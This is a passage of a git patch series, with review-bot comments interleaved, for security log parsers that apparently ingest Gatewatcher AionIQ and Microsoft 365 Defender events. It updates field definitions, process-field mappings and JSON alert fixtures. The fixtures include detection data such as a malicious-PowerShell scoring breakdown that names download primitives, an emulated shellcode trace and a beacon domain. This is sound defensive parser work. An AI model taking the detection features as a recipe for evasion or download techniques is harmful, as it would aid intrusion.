\"2022-09-01T10:49:46.643Z\"\n}", From e63a079f938c7a7746e101d707896603b6252e43 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 1 Oct 2024 19:20:41 +0200 Subject: [PATCH 099/317] fix(GateWatcher): change the identifier of the AIONIQ V103 format --- GateWatcher/aioniq_ecs/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq_ecs/_meta/manifest.yml b/GateWatcher/aioniq_ecs/_meta/manifest.yml index d6480f719..a1e0c5867 100644 --- a/GateWatcher/aioniq_ecs/_meta/manifest.yml +++ b/GateWatcher/aioniq_ecs/_meta/manifest.yml @@ -1,4 +1,4 @@ -uuid: e9fbba55-89c2-4b6c-ad15-9a46412dd680 +uuid: 2f28e4f9-a4f3-40a6-9909-b69f3df32535 name: Gatewatcher AionIQ V103 slug: aioniq-v103 From 59f174e5a2cf781aebc37c8c9d90ae217ca3fbe2 Mon Sep 17 00:00:00 2001 
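Review bot: The manifest uuid moves from e9fbba55-89c2-4b6c-ad15-9a46412dd680 to 2f28e4f9-a4f3-40a6-9909-b69f3df32535, but the GateWatcher test fixtures touched by the preceding commit in this series (nba.json, ransomware.json, retrohunt.json, sigflow_alert.json, sigflow_stats.json) still carry `"dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"` under sekoiaio.intake. If the harness resolves the intake by that identifier, those fixtures now reference a format id that no longer exists and should be updated in this commit; if dialect_uuid is informational only, a sentence in the commit message saying so would settle the question. Presumably downstream consumers key on this uuid, so a changelog line stating that the old identifier is retired would also help anyone who pinned it.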
From: Sebastien Quioc
Date: Tue, 1 Oct 2024 19:22:42 +0200
Subject: [PATCH 100/317] fix(GateWatcher): declare subfields
---
 GateWatcher/aioniq_ecs/_meta/fields.yml | 57 ++++++++++---------
 .../aioniq_ecs/tests/beacon_event.json | 6 +-
 .../tests/codebreaker_powershell_alert.json | 2 +-
 .../tests/codebreaker_shellcode_alert.json | 7 ++-
 .../aioniq_ecs/tests/malcore_event.json | 2 +-
 GateWatcher/aioniq_ecs/tests/metadata.json | 7 ++-
 .../aioniq_ecs/tests/sigflow_alert.json | 4 +-
 7 files changed, 52 insertions(+), 33 deletions(-)
diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index a036865f3..e53df154f 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -373,10 +373,15 @@ gatewatcher.http.hostname:
 name: gatewatcher.http.hostname
 type: text
-gatewatcher.http.http2:
- description: http http2 field
- name: gatewatcher.http.http2
- type: text
+gatewatcher.http.http2.request.priority:
+ description: http http2 request priority field
+ name: gatewatcher.http.http2.request.priority
+ type: number
+
+gatewatcher.http.http2.stream_id:
+ description: http http2 stream_id field
+ name: gatewatcher.http.http2.stream_id
+ type: number
 gatewatcher.http.http_refer:
 description: http_refer field
@@ -616,7 +621,7 @@ gatewatcher.malcore.analyzers_up:
 gatewatcher.malcore.code:
 description: malcore code field
 name: gatewatcher.malcore.code
- type: number
+ type: keyword
 gatewatcher.malcore.detail_scan_time:
 description: malcore detail_scan_time field
@@ -698,9 +703,9 @@ gatewatcher.malicious_powershell.score:
 name: gatewatcher.malicious_powershell.score
 type: number
-gatewatcher.malicious_powershell.score_details:
+gatewatcher.malicious_powershell.score_details_text:
 description: malicious_powershell score_details field
- name: gatewatcher.malicious_powershell.score_details
+ name: gatewatcher.malicious_powershell.score_details_text
 type: text
 gatewatcher.matched_event.file.gaps:
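Review bot: `gatewatcher.malicious_powershell.score_details_text` is renamed to mark the value as opaque text, but its entry keeps `description: malicious_powershell score_details field`, which no longer tells a reader why the field is text rather than an object; the codebreaker_powershell_alert.json fixture in this same commit shows the value is a JSON document serialized into a string. Suggest `description: malicious_powershell score_details, kept as the raw JSON string (not parsed into subfields)`. The same stale description applies to `gatewatcher.shellcode.analysis_text` in the -1018 hunk and to `gatewatcher.tls.client.server_name` in the -1263 hunk, which retains the generic `description: TLS meta data field` after being narrowed to a single subfield — `description: TLS client server_name field` would match the wording of the neighbouring entries.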
@@ -1018,15 +1023,15 @@ gatewatcher.rfb.server_security_failure_reason:
 name: gatewatcher.rfb.server_security_failure_reason
 type: text
-gatewatcher.shellcode.analysis:
+gatewatcher.shellcode.analysis_text:
 description: shellcode analysis field
- name: gatewatcher.shellcode.analysis
+ name: gatewatcher.shellcode.analysis_text
 type: text
 gatewatcher.shellcode.encodings:
 description: shellcode encodings field
 name: gatewatcher.shellcode.encodings
- type: text
+ type: array
 gatewatcher.shellcode.id:
 description: shellcode id field
@@ -1068,10 +1073,10 @@ gatewatcher.sigflow.packet:
 name: gatewatcher.sigflow.packet
 type: text
-gatewatcher.sigflow.packet_info:
- description: sigflow packet_info field
- name: gatewatcher.sigflow.packet_info
- type: text
+gatewatcher.sigflow.packet_info.linktype:
+ description: sigflow packet_info linktype field
+ name: gatewatcher.sigflow.packet_info.linktype
+ type: number
 gatewatcher.sigflow.payload:
 description: sigflow payload field
@@ -1223,16 +1228,6 @@ gatewatcher.ssh.server.software_version:
 name: gatewatcher.ssh.server.software_version
 type: text
-gatewatcher.syslog.message:
- description: syslog message field
- name: gatewatcher.syslog.message
- type: text
-
-gatewatcher.syslog.priority:
- description: syslog priority field
- name: gatewatcher.syslog.priority
- type: text
-
 gatewatcher.syslog.facility.code:
 description: syslog facility code field
 name: gatewatcher.syslog.facility.code
@@ -1243,6 +1238,16 @@ gatewatcher.syslog.facility.name:
 name: gatewatcher.syslog.facility.name
 type: text
+gatewatcher.syslog.message:
+ description: syslog message field
+ name: gatewatcher.syslog.message
+ type: text
+
+gatewatcher.syslog.priority:
+ description: syslog priority field
+ name: gatewatcher.syslog.priority
+ type: text
+
 gatewatcher.syslog.severity.name:
 description: syslog severity name field
 name: gatewatcher.syslog.severity.name
@@ -1263,9 +1268,9 @@ gatewatcher.tftp.packet: name: gatewatcher.tftp.packet type: text -gatewatcher.tls: +gatewatcher.tls.client.server_name: description: TLS meta data field - name: gatewatcher.tls + name: gatewatcher.tls.client.server_name type: text gatewatcher.user_agent.major: diff --git a/GateWatcher/aioniq_ecs/tests/beacon_event.json b/GateWatcher/aioniq_ecs/tests/beacon_event.json index 228c38f0c..707d65357 100644 --- a/GateWatcher/aioniq_ecs/tests/beacon_event.json +++ b/GateWatcher/aioniq_ecs/tests/beacon_event.json @@ -50,7 +50,11 @@ "log_format_version": "1.0.0", "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f" }, - "tls": "{\"client\": {\"server_name\": \"cisco-update.com\"}}", + "tls": { + "client": { + "server_name": "cisco-update.com" + } + }, "version": "1" }, "network": { diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json index 5d691dec4..55f01813f 100644 --- a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json +++ b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json 
@@ -36,7 +36,7 @@ "proba_obfuscated": 1, "sample_id": "09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr", "score": 1890, - "score_details": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}" + "score_details_text": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}" }, "network": { "flow_id": 779924698221176, diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json index 1ee17a006..5e1061891 100644 --- a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json +++ b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json 
@@ -49,14 +49,17 @@ "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f" }, "shellcode": { - "analysis": [ + "analysis_text": [ "{\"_id\": -1, \"info\": \"Stop : End of shellcode (Exit)\"}", "{\"_id\": 0, \"args\": \"{lpFileName: user32.dll}\", \"call\": \"kernel32_LoadLibraryA\", \"ret\": \"0x70600000\"}", "{\"_id\": 1, \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\", \"call\": \"user32_MessageBoxA\", \"ret\": \"1\"}", "{\"_id\": 2, \"args\": \"{uExitCode: 0}\", \"call\": \"kernel32_ExitProcess\", \"ret\": \"0\"}" ], "encodings": [ - "{\"count\": 4, \"name\": \"Bloxor\"}" + { + "count": 4, + "name": "Bloxor" + } ], "id": "790a2aa742e1da23e14c9b7270ee81a1", "sample_id": "09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr", diff --git a/GateWatcher/aioniq_ecs/tests/malcore_event.json b/GateWatcher/aioniq_ecs/tests/malcore_event.json index d9aec47da..27393e551 100644 --- a/GateWatcher/aioniq_ecs/tests/malcore_event.json +++ b/GateWatcher/aioniq_ecs/tests/malcore_event.json @@ -60,7 +60,7 @@ "analyzed_other": 4, "analyzed_suspicious": 0, "analyzers_up": 16, - "code": 1, + "code": "1", "detail_scan_time": 373, "detail_threat_found": "Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash", "detail_wait_time": 660, diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json index 124260a3d..8814beb9d 100644 --- a/GateWatcher/aioniq_ecs/tests/metadata.json +++ b/GateWatcher/aioniq_ecs/tests/metadata.json @@ -31,7 +31,12 @@ "id": "78681613-57af-4e10-b732-58f5d2e0ae12" }, "http": { - "http2": "{\"request\": {\"priority\": 15}, \"response\": {}, \"stream_id\": 13}" + "http2": { + "request": { + "priority": 15 + }, + "stream_id": 13 + } }, "metadata": { "flowbits": [ 
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json index 1bcd1b452..de7d99791 100644 --- a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json +++ b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json @@ -71,7 +71,9 @@ "gid": 1, "metadata": "{\"attack_target\": [\"Client_Endpoint\"], \"created_at\": [\"2019_04_23\"], \"deployment\": [\"Perimeter\"], \"performance_impact\": [\"Significant\"], \"signature_severity\": [\"Informational\"], \"updated_at\": [\"2022_11_21\"]}", "packet": "AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA", - "packet_info": "{\"linktype\": 1}", + "packet_info": { + "linktype": 1 + }, "payload": "R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==", "payload_printable": "GET /malcore_10KB_clean.pdf HTTP/1.1\r\nHost: 56.53.117.115\r\nAccept-Encoding: gzip,compress,deflate\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\n\r\n", "rev": 4, From d823688c0479b398b2775bd008908cf5950f7785 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 2 Oct 2024 12:15:15 +0200 Subject: [PATCH 101/317] Improve process fields in some cases --- Microsoft/microsoft-365-defender/CHANGELOG.md | 6 ++ .../microsoft-365-defender/_meta/fields.yml | 22 +++++ .../microsoft-365-defender/ingest/parser.yml | 57 ++++++++--- .../tests/test_device_event.json | 37 +++---- .../tests/test_device_process_created.json | 8 +- .../tests/test_device_process_events.json | 35 ++++--- .../tests/test_local_ip.json | 39 +++----- .../tests/test_process_error.json | 99 +++++++++++++++++++ 8 files changed, 214 insertions(+), 89 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_process_error.json diff --git a/Microsoft/microsoft-365-defender/CHANGELOG.md b/Microsoft/microsoft-365-defender/CHANGELOG.md index 73fac4a78..2f0ea38af 100644 
--- a/Microsoft/microsoft-365-defender/CHANGELOG.md +++ b/Microsoft/microsoft-365-defender/CHANGELOG.md @@ -7,6 +7,12 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## 2023-12-07 - 1.0.2 + +### Fixed + +- Fix process fields in some categories + ## 2023-12-07 - 1.0.1 ### Changed diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 3a95175de..d2c57d50a 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -837,3 +837,25 @@ process.user.name: description: User name of the account that ran the process responsible for the event name: process.user.name type: keyword + +process.parent.user.domain: + description: Domain of the account that ran the parent process responsible for the event + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: User principal name (UPN) of the account that ran the parent process responsible + for the event + name: process.parent.user.email + type: keyword + +process.parent.user.id: + description: Security Identifier (SID) of the account that ran the parent process responsible + for the event + name: process.parent.user.id + type: keyword + +process.parent.user.name: + description: User name of the account that ran the parent process responsible for the event + name: process.parent.user.name + type: keyword diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0704ce4ca..d0ff72f0a 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -124,22 +124,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: 
"{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" 
@@ -257,6 +241,47 @@ stages: - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + + - set: + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: 
"{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + filter: '{{ json_event.message.get("category") != "AdvancedHunting-DeviceEvents" and json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' + + - set: + process.name: "{{json_event.message.properties.FileName}}" + process.executable: "{{json_event.message.properties.FolderPath}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.hash.md5: "{{json_event.message.properties.MD5}}" + process.hash.sha1: "{{json_event.message.properties.SHA1}}" + process.hash.sha256: "{{json_event.message.properties.SHA256}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceEvents" or json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' set_alert_evidence_fields: actions: - set: 
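Review bot: The second `set` block (DeviceEvents/DeviceProcessEvents branch) declares `process.parent.name` twice — once after `process.parent.start` and again after `process.parent.command_line` — which is a duplicate YAML mapping key: PyYAML silently keeps the last occurrence while strict loaders reject the document, so the winning mapping depends on the loader. Drop the second occurrence and, for consistency with the other branch which applies `| basename` to the same property, keep `process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"`. In that same branch nothing populates `process.user.*` for the created process even though the DeviceProcessEvents payload carries `AccountName`, `AccountDomain`, `AccountSid` and `AccountUpn` (visible in the new test_process_error.json input); if that is intentionally left to the top-level `user.*` mapping, a comment on the filter line saying so would prevent someone re-adding it. The enclosing `stages` mapping starts outside the hunk.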
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index ca708b0ed..a1f8cc8d4 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json 
@@ -53,35 +53,22 @@ "--sandboxed-process-id=2", "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\"" ], - "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - }, - "name": "software_reporter_tool.exe", "parent": { + "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", "name": "software_reporter_tool.exe", - "pid": 15532, - "start": "2022-09-01T06:56:23.595229Z" - }, - "pid": 1664, - "start": "2022-09-01T06:56:23.788784Z", - "user": { - "domain": "intranet", - "email": "user@example.org", - "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", - "name": "group1" - }, - "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" + "pid": 1664, + "start": "2022-09-01T06:56:23.788784Z", + "user": { + "domain": "intranet", + "email": "user@example.org", + "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "name": "group1" + }, + "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" + } }, "related": { - "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - 
"51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - ], "ip": [ "1.2.3.4", "5.6.7.8" diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index cd2ca7981..7acf31f01 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,9 +29,11 @@ } }, "process": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" + "parent": { + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" + } } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..5d3587480 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json 
@@ -74,33 +74,32 @@ "subject_name": "OsVendor" }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0\\MpCmdRun.exe", "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + "md5": "17bd5d291205f95eb9ede9e75d5641d7", + "sha1": "81ea1283c9c328fef3ea93e92dc827f1280b32aa", + "sha256": "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf" }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, - "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "start": "2023-01-04T14:15:10.355033Z" }, "related": { "hash": [ "17bd5d291205f95eb9ede9e75d5641d7", - "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e", - "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "5d5608654828cf052ba013b3c37cbb61", "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf", "81ea1283c9c328fef3ea93e92dc827f1280b32aa" ], 
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 3cedbfdb3..854ddd181 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json 
@@ -49,35 +49,20 @@ "--sandboxed-process-id=2", "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\"" ], - "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - }, - "name": "software_reporter_tool.exe", "parent": { + "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", "name": "software_reporter_tool.exe", - "pid": 15532, - "start": "2022-09-01T06:56:23.595229Z" - }, - "pid": 1664, - "start": "2022-09-01T06:56:23.788784Z", - "user": { - "domain": "intranet", - "email": "user@example.org", - "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", - "name": "group1" - }, - "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" - }, - "related": { - "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - "51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - ] + "pid": 1664, + "start": "2022-09-01T06:56:23.788784Z", + "user": { + "domain": "intranet", + "email": "user@example.org", + "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "name": "group1" + }, + 
"working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200" + } } } } \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json new file mode 100644 index 000000000..934585ad4 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json 
@@ -0,0 +1,99 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + }, + "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F 
